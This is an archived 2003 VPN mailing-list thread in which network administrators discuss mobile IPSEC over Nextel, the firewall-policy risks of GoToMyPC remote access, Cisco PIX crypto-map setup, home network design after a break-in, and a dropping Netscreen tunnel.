--- Jim Atherton wrote: > Guess I need to be a little more clear. We use the > VPN 3000 concentrator. I > have a laptop. I need to connect to my work > environment with my laptop over > some mobile (moving) method. I have the VPN 3000 > software client on my PC > and Windows 2000 PPTP (which the VPN 3000 also will > allow as a client). I > have a Nextel phone. I noticed that Nextel has a > mobile connectivity > solution (Packetstream gold) and tried about 6 > months ago to make it work. > It didn't. There is an old thread somewhere on this > server that states that > Motorola's compression hardware used by Nextel did > not support IPSEC > compression (this was during the summer of 2002) but > that it would in late > 2002. I am trying to find info about whether or not > it does now (Nextel has > no clue and no one at Nextel (that I can reach) knows > anything about the > technical details of this product Packetstream Gold. > Also would accept > alternative cost effective methods (have to approach > at least 28.8 speeds). > This is an interesting area that no one seems to have > a clue about. Since my > company resells various VPN solutions nationwide, I > have a feeling at least > of the potential for this as a product and am a > little surprised that no one > has filled this gap. > > -----Original Message----- > From: hakan.palm at generic.se > [mailto:hakan.palm at generic.se] > Sent: Tuesday, April 15, 2003 5:08 PM > To: jim.atherton at netifice.com > Cc: vpn at lists.shmoo.com > Subject: Ang: [VPN] IPSEC or PPTP over Nextel > Packetstream Gold > > > Jim, > > are you trying to connect to a Cisco VPN 3002 > Hardware > Client with another client?
> If so, the simple answer is as far as I know, no you > can not > terminate the VPN tunnel from another client like > the Cisco > VPN Client at the VPN 3002. Simply because the Cisco > VPN 3002 is a hardware client and not a > concentrator. > > For a mobile solution the VPN 3000 Concentrator > range is > IMNHO really nice to work with and well suited. You > can > use the Cisco VPN Client on a laptop running all but > the > archaic versions of Windows, Mac OS X, Linux... > There is > 3rd party support for older Mac OS, Symbian, Pocket > PC > and PalmOS. > > HTH > > Regards, > /Palm > > > > > jim.atherton at netifice.com > 2003-04-15 20:35 > > To: vpn at lists.shmoo.com @ INTERNET > Cc: (Blank: Hakan Palm/Generic) > Subject: [VPN] IPSEC or PPTP over Nextel > Packetstream Gold > > I need a mobile connectivity solution that supports > either (I would like > both and prefer IPSEC) IPSEC (Specifically Cisco VPN > client 3.5.x or later) > or PPTP (via Windows 2000 native PPTP). I need to > connect to a Cisco VPN > 3000 hardware client. I looked into this last year > and actually tested with > Nextel and neither worked and the guys at Nextel > didn't know why. I ran > across an old mail archive here that said that the > compression used by > Nextel Packetstream Gold used a compression > technology that precluded use of > IPSEC and that this would change sometime in the > last quarter of 2002. Does > anyone have any info about the current or near term > status of this product? > My company sells a set of VPN products and services > and a useful mobile > wireless VPN solution is needed. Before Ricochet > crashed we did some stuff > with them. But since then we have had no wireless > mobile solution. If there > are any other cost effective mobile wireless > solutions out there I would > like to know. Personally, I need connectivity via my > laptop and I can accept > speeds of around 28.8 (true speed) but would like > higher speeds.
Lower, more > expensive solutions are not currently acceptable. I > cannot for instance use > some sort of high speed satellite connection due to > cost. > > Thanks for any info. >

From safieradam at hotmail.com Wed Apr 16 17:16:23 2003
From: safieradam at hotmail.com (safieradam)
Date: Wed, 16 Apr 2003 17:16:23 -0400
Subject: [VPN] Clientless VPN
References:
Message-ID:

Corrections: "URL content filtering" was meant to be "URL scanning and web page content filtering". i.e. block encrypted web page content. "At least our firewall policy needs review" was supposed to be "At least _your_ firewall policy needs review". RG pointed out that there was a thread on the topic a while back. My quick review shows that the common solution was to block the GoToMyPC servers. While that may work for now because the GoToMyPC folks are nice enough to maintain a single server farm, it leaves a network open to variations / competitors, like http://www.htthost.com. Hackers have used tunneling for a long time so it's not just web pages and http. The only real solution I see is to prohibit encrypted application content in high level policy and actually block encrypted application content in your perimeter defense or proxy server. Adds a nice bit of overhead. At least content filtering is not a new concept and vendors exist.
Adam Safier

----- Original Message -----
From: "safieradam"
Sent: Wednesday, April 16, 2003 12:10 PM
Subject: [VPN] Clientless VPN

> I'm raising the specter of clientless VPN again because I came across this service which seems to meet the requirements:
>
> I do consider this a form of VPN. They may only be transmitting the screen image, essentially pcAnywhere like, but the functionality of getting the work done is there.
>
> They download the client as a java app so the user does not need to do special installation. Instead, it keeps polling a service server so the initial connection is outbound.
>
> Despite my security issues with it this is very attractive. Even has PDA, Mac and Unix support....
>
> https://www.gotomypc.com
>
> Security issues:
>
> Password user authentication only. I assume this will change as the service evolves. On the positive side, they do seem to use digital signatures on the target - "multiple passwords, including an access code that resides on the host computer and is never transmitted or stored on GoToMyPC servers".
>
> They advertise/encourage using Kiosk PCs for the client. If you are using someone else's PC you cannot be sure key-stroke/screen/memory logging is not going on so your personal passwords could be captured. A PC/PDA you control is better as long as you didn't execute some malware along the line.
>
> - You trust the service / software. You are downloading their Java applet, which could change anytime. You are essentially trusting them to encrypt the link from the client to the host and not peek. Well, the company trusts the VPN admin for the company VPN so if you have a contract with GoTo... That is what security is all about - who do you trust and for what?
>
> - Can bypass firewall. At least our firewall policy needs review and this could be a headache. Both the client and the "target" initiate outbound connections to a third party service.
> If your company policy allows outbound surfing to just about any address your users could set this up to or from their office PC without your knowledge. You may need to implement IP and DNS name filtering for outbound traffic. That will only work if GoToMyPC plays nice and doesn't get into rotating names and addresses or sell the server part to companies that use their own IP addresses to set up a corporate service. URL content filtering on outbound traffic might work.
>
> - Does the phrase below mean that if your policy is to disable all downloading on the user's PC GoToMyPC launches their own program that ignores the browser and downloads and runs a Java app?
> "For a user who connects to the host computer via a client with a Mac or Unix operating system (or from a Windows-based client that does not accept downloadable files), the Java-enabled Universal Viewer launches automatically. There is nothing the user needs to do to select the appropriate Viewer - our technology will automatically detect the client computer's operating system and launch the appropriate Viewer."
>
> Any other holes I missed?
>
> I see a review of many companies' policies coming up.
>
> Adam Safier

From scottn at s2s.ltd.uk Thu Apr 17 03:51:31 2003
From: scottn at s2s.ltd.uk (Scott Nursten)
Date: Thu, 17 Apr 2003 08:51:31 +0100
Subject: [VPN] Multiple VPN connections PIX

Hi Jorge,

Of course there is. You don't really think Cisco would sell an enterprise VPN solution claiming that it can terminate between 10 and 2000+ connections when it can't do that, do you? :)

All you need to do is add more entries in the crypto maps with higher/lower priorities. You can also use entirely different crypto maps _provided_ you have multiple interfaces, as only one map can be applied to an interface.
In terms of processing etc. there is no _real_ (no flame pls) overhead by running through the priorities like this, just ensure that you config them in order of importance/usage. It's the nature of IPSec at any rate, as peers must negotiate crypto parameters, so you can consider this step as an extra negotiation parameter.

If you need some help with the config, drop me a line.

Regards,

Scott Nursten
CTO
S2S Ltd
Cisco Security Specialised Partner
http://s2s.ltd.uk

On 16/4/03 19:38, "jmondaca at entelsa.entelnet.bo" wrote:

> Is there any way to configure multiple simultaneous VPN connections only using cisco PIX. If not what other solutions are available?
>
> Regards,
>
> _______________________________________
> Jorge Mondaca
> Corporate Security Management
> (591) 2-2313030 ext 2021
> (591) 72029832

From tjevans at bearingpoint.net Thu Apr 17 06:35:07 2003
From: tjevans at bearingpoint.net (Evans, TJ (BearingPoint))
Date: Thu, 17 Apr 2003 06:35:07 -0400
Subject: [VPN] Clientless VPN (apologies for the cross-post)

If I read your statement(s) correctly - you recommend blocking all encrypted traffic?

IMHO - this leaves a few problems unsolved, and creates many new ones!

Unsolved: Unencrypted, although possibly still tunneled, traffic. (ICMP tunnels, remote command prompt (e.g. NetCat), etc. etc.)

Newly created: You would block all SSL'ified websites? Block all encrypted mail? Etc.

Don't get me wrong - there are ways to mitigate the new problems, but my concern would be that I think this would send the wrong message to your employees ... and discourage (prevent?) them from following good practices (encrypting important client emails, only logging into sites that make use of SSL, etc.).

Naturally - the real-world / business needs of your employees may permit such an approach ...
but I think this would lean too far to one side of the "security vs. functionality/usability" scale for most.

Thanks!
TJ

From greg.l.owens at verizon.net Thu Apr 17 08:26:19 2003
From: greg.l.owens at verizon.net (Greg Owens Jr)
Date: Thu, 17 Apr 2003 08:26:19 -0400
Subject: [VPN] Multiple VPN connections PIX
Message-ID: <001101c304dc$90973250$0100a8c0@rock.rock.com>

> Subject: [VPN] Multiple VPN connections PIX
>
> Is there any way to configure multiple simultaneous VPN connections only using cisco PIX. If not what other solutions are available?

Yes the PIX can do this.
Just configure some crypto maps with different numbers.

Greg Owens
202-398-2552
fax 202-399-7690

-----Original Message-----
From: vpn-admin at lists.shmoo.com [mailto:vpn-admin at lists.shmoo.com] On Behalf Of vpn-request at lists.shmoo.com
Sent: Thursday, April 17, 2003 8:00 AM
To: vpn at lists.shmoo.com
Subject: VPN digest, Vol 1 #157 - 8 msgs

Today's Topics:

1. Re: [VPN] IPSEC or PPTP over Nextel Packetstream Gold (hakan.palm at generic.se)
2. RE: IPSEC or PPTP over Nextel Packetstream Gold (Jim Atherton)
3. vpn on a lan running win98se (derricko at dwightcav.com)
4. Re: Re: [VPN] VPN help (safieradam)
5. Clientless VPN (safieradam)
6. Multiple VPN connections PIX (jmondaca at entelsa.entelnet.bo)
7. RE: IPSEC or PPTP over Nextel Packetstream Gold (Jac)
8. Re: Clientless VPN (safieradam)

Message: 1
From: hakan.palm at generic.se
Date: Tue, 15 Apr 2003 23:08:21 +0200
To: jim.atherton at netifice.com
Cc: vpn at lists.shmoo.com
Subject: Re: [VPN] IPSEC or PPTP over Nextel Packetstream Gold

Jim,

are you trying to connect to a Cisco VPN 3002 Hardware Client with another client?
If so, the simple answer is as far as I know, no you can not terminate the VPN tunnel from another client like the Cisco VPN Client at the VPN 3002=2E Simply because the Cisco VPN 3002 is a hardware client and not a concentrator=2E For a mobile solution the VPN 3000 Concentrator range i IMNHO really nice to work with and well suited=2E You can use the Cisco VPN Client on a laptop running all but the archaic versions of Windows, Mac OS X, Linux=2E=2E=2E There are 3rd party support for older Mac OS, Symbian, Pocket PC and PalmOS=2E HTH Regards, /Palm jim=2Eatherton at netifice=2Ecom 2003-04-15 20:35 Till: vpn at lists=2Eshmoo=2Ecom @ INTERNET Kopia: (Blank: Hakan Palm/Generic) =C4rende: [VPN] IPSEC or PPTP over Nextel Packetstream Gold I need a mobile connectivity solution that supports either (I would like both and prefer IPSEC) IPSEC (Specifically Cisco VPN client 3=2E5=2Ex or later) or PPTP (via Windows 2000 native PPTP)=2E I need to connect to a Cisco VPN 3000 hardware client=2E I looked into this last year and actually tested with Nextel and neither worked and the guys at Nextel didn't know why=2E I ran across an old mail archive here that said that the compression used by Nextel Packetstream Gold used a compression technology that precluded use of IPSEC and that this would change sometime in the last quarter of 2002=2E Does anyone have any info about the current or near term status of this product? 
My company sells a set of VPN products and services and a useful mobile wireless VPN solution is needed=2E Before Richocet crashed we did some stuff with them=2E But since then we have had no wireless mobile solution=2E If there are any other cost effective mobile wireless solutions out there I would like to know=2E Personally, I need connectivity via my laptop and a can accept speeds of around 28=2E8 (true speed) but would like higher speeds=2E Lower, more expensive solutions are not currently acceptable=2E I cannot for instance use some sort of high speed satellite connection due to cost=2E Thanks for any info=2E _______________________________________________ VPN mailing list VPN at lists=2Eshmoo=2Ecom http://lists=2Eshmoo=2Ecom/mailman/listinfo/vpn --__--__-- Message: 2 From: Jim Atherton To: "'hakan.palm at generic.se'" , Jim Atherton Cc: vpn at lists.shmoo.com Subject: RE: [VPN] IPSEC or PPTP over Nextel Packetstream Gold Date: Tue, 15 Apr 2003 14:18:55 -0700 Guess I need to be a little more clear. We use the VPN 3000 = concentrator. I have a laptop. I need to connect to my work environment with my laptop = over some mobile (moving) method. I have the VPN 3000 software client on my = PC and Windows 2000 PPTP (which the VPN 3000 also will allow as a client). = I have a Nextel phone. I noticed that Nextel has a mobile connectivity solution (Packetstream gold) and tried about 6 months ago to make it = work. It didn't. There is an old thread somewhere on this server that states = that Motorola's compression hardware used by Nextel did not support IPSEC compression (this was during the summer of 2002) but that it would in = late 2002. I am trying to find info about whether or not it does now (Nextel = has no clue and noone at Nextel (that I can reach) knows anything about the technical details of this product Packetstream Gold. Also would accept alternative cost effective methods (have to approach at least 28.8 = speeds). 
This is an interesting area that noone seems to have a clue about. = Since my company resells various VPN solutions nationwide, I have a feeling at = least of the potential for this as a product and am a little surprised that = noone has filled this gap. -----Original Message----- From: hakan.palm at generic.se [mailto:hakan.palm at generic.se] Sent: Tuesday, April 15, 2003 5:08 PM To: jim.atherton at netifice.com Cc: vpn at lists.shmoo.com Subject: Ang: [VPN] IPSEC or PPTP over Nextel Packetstream Gold Jim, are you trying to connect to a Cisco VPN 3002 Hardware Client with another client? If so, the simple answer is as far as I know, no you can not terminate the VPN tunnel from another client like the Cisco VPN Client at the VPN 3002. Simply because the Cisco VPN 3002 is a hardware client and not a concentrator. For a mobile solution the VPN 3000 Concentrator range i IMNHO really nice to work with and well suited. You can use the Cisco VPN Client on a laptop running all but the archaic versions of Windows, Mac OS X, Linux... There are 3rd party support for older Mac OS, Symbian, Pocket PC and PalmOS. HTH Regards, /Palm jim.atherton at netifice.com 2003-04-15 20:35 =09 Till: vpn at lists.shmoo.com @ INTERNET Kopia: (Blank: Hakan Palm/Generic) =C4rende: [VPN] IPSEC or PPTP over Nextel Packetstream Gold I need a mobile connectivity solution that supports either (I would = like both and prefer IPSEC) IPSEC (Specifically Cisco VPN client 3.5.x or = later) or PPTP (via Windows 2000 native PPTP). I need to connect to a Cisco = VPN 3000 hardware client. I looked into this last year and actually tested = with Nextel and neither worked and the guys at Nextel didn't know why. I ran across an old mail archive here that said that the compression used by Nextel Packetstream Gold used a compression technology that precluded = use of IPSEC and that this would change sometime in the last quarter of 2002. 
= Does anyone have any info about the current or near term status of this = product? My company sells a set of VPN products and services and a useful mobile wireless VPN solution is needed. Before Richocet crashed we did some = stuff with them. But since then we have had no wireless mobile solution. If = there are any other cost effective mobile wireless solutions out there I = would like to know. Personally, I need connectivity via my laptop and a can = accept speeds of around 28.8 (true speed) but would like higher speeds. Lower, = more expensive solutions are not currently acceptable. I cannot for instance = use some sort of high speed satellite connection due to cost. Thanks for any info. _______________________________________________ VPN mailing list VPN at lists.shmoo.com http://lists.shmoo.com/mailman/listinfo/vpn --__--__-- Message: 3 From: derricko at dwightcav.com To: Date: Wed, 16 Apr 2003 15:55:52 +0100 Subject: [VPN] vpn on a lan running win98se This is a multi-part message in MIME format. ------=_NextPart_000_001F_01C30430.A88C1580 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable We have a small LAN at work which is peer-to-peer, running win98se, = proxy server software to ADSL, is it possible to make our 'fileserver' = act as a server so the chairman can log on remotely as if he was in his = office. If so what software do you suggest? regards Derrick ------=_NextPart_000_001F_01C30430.A88C1580 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
We have a small LAN at work which is peer-to-peer, = running=20 win98se, proxy server software to ADSL, is it possible to make our = 'fileserver'=20 act as a server so the chairman can log on remotely as if he was in his=20 office.
 
If so what software do you = suggest?
 
regards
 
Derrick
------=_NextPart_000_001F_01C30430.A88C1580-- --__--__-- Message: 4 From: "safieradam" To: Cc: , Subject: Re: Re: [VPN] VPN help Date: Wed, 16 Apr 2003 10:32:01 -0400 I wonder if this service would work on a PDA set up for browsing the internet. The client is Java applet downloaded from the gateway and they have a "wireless" version..... https://www.gotomypc.com Adam Safier ----- Original Message ----- From: To: Cc: ; Sent: Sunday, April 13, 2003 8:44 AM Subject: Ang: Re: [VPN] VPN help Ceritcom's movianVPN client, www.certicom.com/products/movian/movianvpn.html, can be used to connect to e.g. Cisco VPN 3000 and runs on PalmOS, Pocket PC and Symbian. They also have a FIPS-140-2 compliant client for PalmOS and Pocket PC. Might be worth looking at... HTH, /Palm --__--__-- Message: 5 From: "safieradam" To: Date: Wed, 16 Apr 2003 12:10:55 -0400 Subject: [VPN] Clientless VPN I'm raising the specter of clientless VPN again because I came across this service which seems to meet the requirements: I do consider this a form of VPN. They may only be transmitting the screen image, essentially pcAnywhere like, but the functionality of getting the work done is there. They download the client as a java app so the user does not need to do special installation. Instead, it keeps polling a service server so the initial connection is outbound. Despite my security issues with it this is very attractive. Even has PDA, Mac and Unix support.... https://www.gotomypc.com Security issues: Password user authentication only. I assume this will change as the service evolves. On the positive side, they do seem to use digital signatures on the target - " multiple passwords, including an access code that resides on the host computer and is never transmitted or stored on GoToMyPC servers ". They advertise/encourage using Kiosk PC's for the client. If you are using someone else's PC you cannot be sure key-stroke/screen/memory logging is not going on so your personal passwords could be captured. 
A PC/PDA you control is better as long as you didn't execute some malware along the line. - You trust the service / software. You are downloading their Java applet, which could change anytime. You are essentially trusting them to encrypt the link from the client to the host and not peek. Well, the company trusts the VPN admin for the company VPN so if you have a contract with GoTo... That is what security is all about - who do you trust and for what? - Can bypasses firewall. At least our firewall policy needs review and this could be a headache. Both the client and the "target" initiate outbound connections to a third party service. If you company policy allows outbound surfing to just about any address your users could set this up to or from their office PC without your knowledge. You may need to implement IP and DNS name filtering for outbound traffic. That will only work if GoToMyPC play nice and don't get into rotating names and addresses or sell the server part to companies that use their own IP addresses to set up a corporate service. URL content filtering on outbound traffic might work. - Does the phrase below mean that if your policy is to disabled all downloading on the users PC GoToMyPC launch their own program that ignores the browser and downloads and runs a Java app? " For a user who connects to the host computer via a client with a Mac or Unix operating system (or from a Windows-based client that does not accept downloadable files), the Java-enabled Universal Viewer launches automatically. There is nothing the user needs to do to select the appropriate Viewer - our technology will automatically detect the client computer's operating system and launch the appropriate Viewer. " Any other holes I missed? I see a review of many companies policies coming up. 
Adam Safier --__--__-- Message: 6 To: From: jmondaca at entelsa.entelnet.bo Date: Wed, 16 Apr 2003 14:38:21 -0400 Subject: [VPN] Multiple VPN connections PIX Is there any way to configure multiple simultaneously VPN connections only using cisco PIX. If not what other solution are available ? Regards, _______________________________________ Jorge Mondaca Gerencia Seguridad Corporativa (591) 2-2313030 ext 2021 (591) 72029832 --__--__-- Message: 7 Date: Wed, 16 Apr 2003 12:49:44 -0700 (PDT) From: Jac Subject: RE: [VPN] IPSEC or PPTP over Nextel Packetstream Gold To: Jim Atherton , "'hakan.palm at generic.se'" Cc: vpn at lists.shmoo.com Are you stuck with the VPN 3000? My understanding Nextel is currently testing Nortel Contivity platform for their mobile VPN offering. Should be available in Q4. I know they have a wireless IPSec client that may give you the solution you need. Maybe you can ask about that and see what they are offering. Jac --- Jim Atherton wrote: > Guess I need to be a little more clear. We use the > VPN 3000 concentrator. I > have a laptop. I need to connect to my work > environment with my laptop over > some mobile (moving) method. I have the VPN 3000 > software client on my PC > and Windows 2000 PPTP (which the VPN 3000 also will > allow as a client). I > have a Nextel phone. I noticed that Nextel has a > mobile connectivity > solution (Packetstream gold) and tried about 6 > months ago to make it work. > It didn't. There is an old thread somewhere on this > server that states that > Motorola's compression hardware used by Nextel did > not support IPSEC > compression (this was during the summer of 2002) but > that it would in late > 2002. I am trying to find info about whether or not > it does now (Nextel has > no clue and noone at Nextel (that I can reach) knows > anything about the > technical details of this product Packetstream Gold. > Also would accept > alternative cost effective methods (have to approach > at least 28.8 speeds). 
> This is an interesting area that noone seems to have > a clue about. Since my > company resells various VPN solutions nationwide, I > have a feeling at least > of the potential for this as a product and am a > little surprised that noone > has filled this gap. > > -----Original Message----- > From: hakan.palm at generic.se > [mailto:hakan.palm at generic.se] > Sent: Tuesday, April 15, 2003 5:08 PM > To: jim.atherton at netifice.com > Cc: vpn at lists.shmoo.com > Subject: Ang: [VPN] IPSEC or PPTP over Nextel > Packetstream Gold > > > Jim, > > are you trying to connect to a Cisco VPN 3002 > Hardware > Client with another client? > If so, the simple answer is as far as I know, no you > can not > terminate the VPN tunnel from another client like > the Cisco > VPN Client at the VPN 3002. Simply because the Cisco > VPN 3002 is a hardware client and not a > concentrator. > > For a mobile solution the VPN 3000 Concentrator > range i > IMNHO really nice to work with and well suited. You > can > use the Cisco VPN Client on a laptop running all but > the > archaic versions of Windows, Mac OS X, Linux... > There are > 3rd party support for older Mac OS, Symbian, Pocket > PC > and PalmOS. > > HTH > > Regards, > /Palm > > > > > jim.atherton at netifice.com > 2003-04-15 20:35 > > Till: vpn at lists.shmoo.com @ INTERNET > Kopia: (Blank: Hakan Palm/Generic) > ?rende: [VPN] IPSEC or PPTP over Nextel > Packetstream Gold > > I need a mobile connectivity solution that supports > either (I would like > both and prefer IPSEC) IPSEC (Specifically Cisco VPN > client 3.5.x or later) > or PPTP (via Windows 2000 native PPTP). I need to > connect to a Cisco VPN > 3000 hardware client. I looked into this last year > and actually tested with > Nextel and neither worked and the guys at Nextel > didn't know why. 
I ran > across an old mail archive here that said that the > compression used by > Nextel Packetstream Gold used a compression > technology that precluded use of > IPSEC and that this would change sometime in the > last quarter of 2002. Does > anyone have any info about the current or near term > status of this product? > My company sells a set of VPN products and services > and a useful mobile > wireless VPN solution is needed. Before Richocet > crashed we did some stuff > with them. But since then we have had no wireless > mobile solution. If there > are any other cost effective mobile wireless > solutions out there I would > like to know. Personally, I need connectivity via my > laptop and a can accept > speeds of around 28.8 (true speed) but would like > higher speeds. Lower, more > expensive solutions are not currently acceptable. I > cannot for instance use > some sort of high speed satellite connection due to > cost. > > Thanks for any info. > > > _______________________________________________ > VPN mailing list > VPN at lists.shmoo.com > http://lists.shmoo.com/mailman/listinfo/vpn > > > > _______________________________________________ > VPN mailing list > VPN at lists.shmoo.com > http://lists.shmoo.com/mailman/listinfo/vpn __________________________________________________ Do you Yahoo!? The New Yahoo! Search - Faster. Easier. Bingo http://search.yahoo.com --__--__-- Message: 8 From: "safieradam" To: Subject: Re: [VPN] Clientless VPN Date: Wed, 16 Apr 2003 17:16:23 -0400 Corrections: "URL content filtering" was meant to be "URL scanning and web page content filtering". i.e. block encrypted web page content. "At least our firewall policy needs review" was supposed to be "At least _your_ firewall policy needs review". RG pointed out that there was a thread on the topic a while back. My quick review shows that the common solution was to block the GoToMyPC servers. 
While that may work for now because the GoToMyPC folks are nice enough to maintain a single server farm, it leaves a network open to variations / competitors, like http://www.htthost.com. Hackers have used tunneling for a long time so it's not just web pages and http. The only real solution I see is to prohibit encrypted application content in high level policy and actually block encrypted application content in your perimiter defense or proxy server. Adds a nice bit of overhead. At least content filtering is not a new concept and vendors exist. Adam Safier ----- Original Message ----- From: "safieradam" To: Sent: Wednesday, April 16, 2003 12:10 PM Subject: [VPN] Clientless VPN > I'm raising the specter of clientless VPN again because I came across this > service which seems to meet the requirements: > > I do consider this a form of VPN. They may only be transmitting the screen > image, essentially pcAnywhere like, but the functionality of getting the > work done is there. > > They download the client as a java app so the user does not need to do > special installation. Instead, it keeps polling a service server so the > initial connection is outbound. > > Despite my security issues with it this is very attractive. Even has PDA, > Mac and Unix support.... > > https://www.gotomypc.com > > Security issues: > > Password user authentication only. I assume this will change as the service > evolves. On the positive side, they do seem to use digital signatures on the > target - " multiple passwords, including an access code that resides on the > host computer and is never transmitted or stored on GoToMyPC servers ". > > They advertise/encourage using Kiosk PC's for the client. If you are using > someone else's PC you cannot be sure key-stroke/screen/memory logging is not > going on so your personal passwords could be captured. A PC/PDA you control > is better as long as you didn't execute some malware along the line. > > - You trust the service / software. 
You are downloading their Java applet, > which could change anytime. You are essentially trusting them to encrypt > the link from the client to the host and not peek. Well, the company trusts > the VPN admin for the company VPN so if you have a contract with GoTo... > That is what security is all about - who do you trust and for what? > > - Can bypasses firewall. At least our firewall policy needs review and th is > could be a headache. Both the client and the "target" initiate outbound > connections to a third party service. If you company policy allows outbound > surfing to just about any address your users could set this up to or from > their office PC without your knowledge. You may need to implement IP and > DNS name filtering for outbound traffic. That will only work if GoToMyPC > play nice and don't get into rotating names and addresses or sell the server > part to companies that use their own IP addresses to set up a corporate > service. URL content filtering on outbound traffic might work. > > - Does the phrase below mean that if your policy is to disabled all > downloading on the users PC GoToMyPC launch their own program that ignores > the browser and downloads and runs a Java app? > " For a user who connects to the host computer via a client with a Mac or > Unix operating system (or from a Windows-based client that does not accept > downloadable files), the Java-enabled Universal Viewer launches > automatically. There is nothing the user needs to do to select the > appropriate Viewer - our technology will automatically detect the client > computer's operating system and launch the appropriate Viewer. " > > Any other holes I missed? > > I see a review of many companies policies coming up. 
>
> Adam Safier
>
> _______________________________________________
> VPN mailing list
> VPN at lists.shmoo.com
> http://lists.shmoo.com/mailman/listinfo/vpn
>

From nirving at casinoreality.com Thu Apr 17 11:04:38 2003
From: nirving at casinoreality.com (Nicholas Irving)
Date: Thu, 17 Apr 2003 16:04:38 +0100
Subject: [VPN] Slightly off topic - pix and internal port redirection
Message-ID: <573C58707068514CA8F542BFB519B8DE727E@dzobdc.dzo.com>

Hi all,

Please shout @ me if this is not allowed - I normally post under nirving at exaol.com, but this is a little broken @ present.

I am wondering if anybody has successfully shut down a pix firewall and redirected traffic to a number of proxies. I would like to redirect any http requests to a squid proxy server and any smtp requests to our exchange server. I can find out how to do port mapping on the external interface but not the internal interface.

Thanks

Nicholas Irving
nirving at casinoreality.com

From safieradam at hotmail.com Thu Apr 17 16:10:43 2003
From: safieradam at hotmail.com (safieradam)
Date: Thu, 17 Apr 2003 16:10:43 -0400
Subject: [VPN] Clientless VPN (apologies for the cross-post)
References:
Message-ID:

No, I am not advocating blocking all encrypted traffic.
I strongly disagree with the brain-dead French government that outlawed strong encryption several years back. I am a big fan of VPN's, including VPN between the client and the application host. Personally, I want SSL connections to web sites that ask for any type of registration information or have private data. I'm also very interested in data-tagging, the encryption of portions of a document so only certain people can access that portion. All of these are great as long as you are managing them, they are under your control and fit within your security policy.

The issue is one of policy enforcement points and monitoring of "general" traffic. Many organizations want to check for viruses in incoming traffic before it reaches the end user. Some also do content filtering on outbound and inbound traffic in an attempt to control sharing of secrets. They usually have security layers of firewalls and IDS systems. Host IDS, firewalls, virus scanning and other security measures add overhead and the available systems are just starting to emerge. Please give me a pointer to a product that can apply content scanning per company policy to outbound S/MIME e-mail _on_the_user's_PC_. Perimeter checkpoints are the most widely implemented method for dealing with Internet security while the tools to put a police team in everyone's home are still developing.

True, the GoToMyPC system primarily transmits screens and plays nice by having a fixed server name (now). But it also has a print and file transfer capability. If a user connects to their home PC via an encrypted link and then surfs from there to xxx.hacz.com they have bypassed security controls that are not loaded directly on the office PC. If the user is at home and connects to his office PC the screens (i.e. data) can be captured and forwarded, bypassing content filtering the company may have implemented. What about competitors that may not be as nice or allow connecting directly host to host?
Hackers have been encrypting back door connections for years. The ones we've caught usually used fixed ports and identifiable traffic patterns. If everyone is suddenly running encrypted traffic over port 80, or other ports for that matter, identifying malware becomes an even bigger hassle than it is today.

What I am saying, in my roundabout way, is that as host to host VPN technology becomes trivial to load and implement, security policy has to be reviewed and security architecture questioned. Do you keep buying IDS and firewalls or do you reduce the costs of labor intensive network IDS monitoring and focus on (labor intensive) end user PC and host IDS monitoring? What will the transition entail and how long will it take? In the meantime, you may wish to do a risk assessment and ban/block encrypted traffic on certain parts of your organization's network. Which parts and which users depends on your security stance and policy.

Adam Safier

----- Original Message -----
From: "Evans, TJ (BearingPoint)"
To: ;
Cc: "safieradam"
Sent: Thursday, April 17, 2003 6:35 AM
Subject: [VPN] Clientless VPN (apologies for the cross-post)

> If I read your statement(s) correctly -
> You recommend blocking all encrypted traffic?
>
> IMHO - This leaves a few problems unsolved, and creates many new ones!
>
> Unsolved:
> Unencrypted, although possibly still tunneled, traffic.
> (ICMP tunnels, remote command prompt (e.g - NetCat), etc. etc.)
>
> Newly Created:
> You would block all SSL'ified websites?
> Block all encrypted mail?
> Etc.
>
> Don't get me wrong - there are ways to mitigate the new problems, but my concern would be that I think this would send the wrong message to your employees ... and discourage (prevent?) them from following good practices (encrypting important client emails, only logging into sites that make use of SSL, etc.).
>
> Naturally - the real-world / business needs of your employees may permit such an approach ...
> but I think this would lean too far to one side of the "security vs. functionality/usability" scale for most.
>
> Thanks!
> TJ
>

From garrettsinfield at hotmail.com Fri Apr 18 00:51:47 2003
From: garrettsinfield at hotmail.com (Garrett Sinfield)
Date: Fri, 18 Apr 2003 04:51:47 +0000
Subject: [VPN] Network Design for security.
Message-ID:

Hello. Recently my network was hacked, and I'm planning on rebuilding my network (they hacked an outdated ftp server that I was unaware was running). I'm not sure if this should really be going on this mailing list, but I was wondering if anyone would know a decent network design that would implement great security.

My home LAN currently consists of a cisco 2507 router (11.2 IOS, soon to upgrade IOS) linksys router (four port). A laptop running slackware, a box running win98, and two other boxes running linux (one box is in a serious need for an upgrade, but I don't have the funds to do it yet). My one box has three NIC cards in it as well, so it could be used as a router.

I was just curious if anyone has a good idea for a network design that I could implement for maximum security. I'm currently somewhat clueless when it comes to networks. I'd also like to know where I should be placing the VPN, and whether or not I should be using PoPToP or FreeS/WAN.

Any ideas or comments would be appreciated!

Thanks

Garrett Sinfield.

From avpnsmith at hotmail.com Fri Apr 18 10:15:06 2003
From: avpnsmith at hotmail.com (avpn smith)
Date: Fri, 18 Apr 2003 14:15:06 +0000
Subject: [VPN] Netscreen 10 - VPN tunnel drops
Message-ID:

Hey all,

I setup a VPN between Netscreen-10 and Checkpoint (remote gateway). After I reset the Netscreen equipment I am able to connect to the remote gateway and other m/cs on that network. But it looks like the tunnel is dropped after a while.
I then have to reset Netscreen-10. Any ideas on how I could maintain the VPN for longer periods. I am a newbie in firewall setup, so any help will be appreciated.

Here are some details after it drops/times out.

ns10-> get vpn
Name            Gateway         RPlay Proposals       Monitor  Use Count
--------------- --------------- ----- --------------- -------- ---------
my-vpn          my-gw-v2        Yes   my-p2           inactive 1
Total VPN Auto: 1
Name Local SPI Remote SPI Algorithm Monitor

ns10-> get ike p2-proposal my-p2
Id Name            Grp Protocol Enc_alg Auth_alg Lifetime   Lifesize
-- --------------- --- -------- ------- -------- ---------- ----------
8  my-p2           0   ESP      3DES    MD5      3600       0

ns10->
ns10-> get ike p1-proposal my-p1
Id Name            Auth     Grp ESP-e ESP-a Lifetime
-- --------------- -------- --- ----- ----- ----------
8  my-p1           Preshare 2   3DES  MD5   7200

regards
-as

From jacob at excaliburfilms.com Fri Apr 18 18:05:55 2003
From: jacob at excaliburfilms.com (Jacob)
Date: Fri, 18 Apr 2003 15:05:55 -0700
Subject: [VPN] Network Design for security.
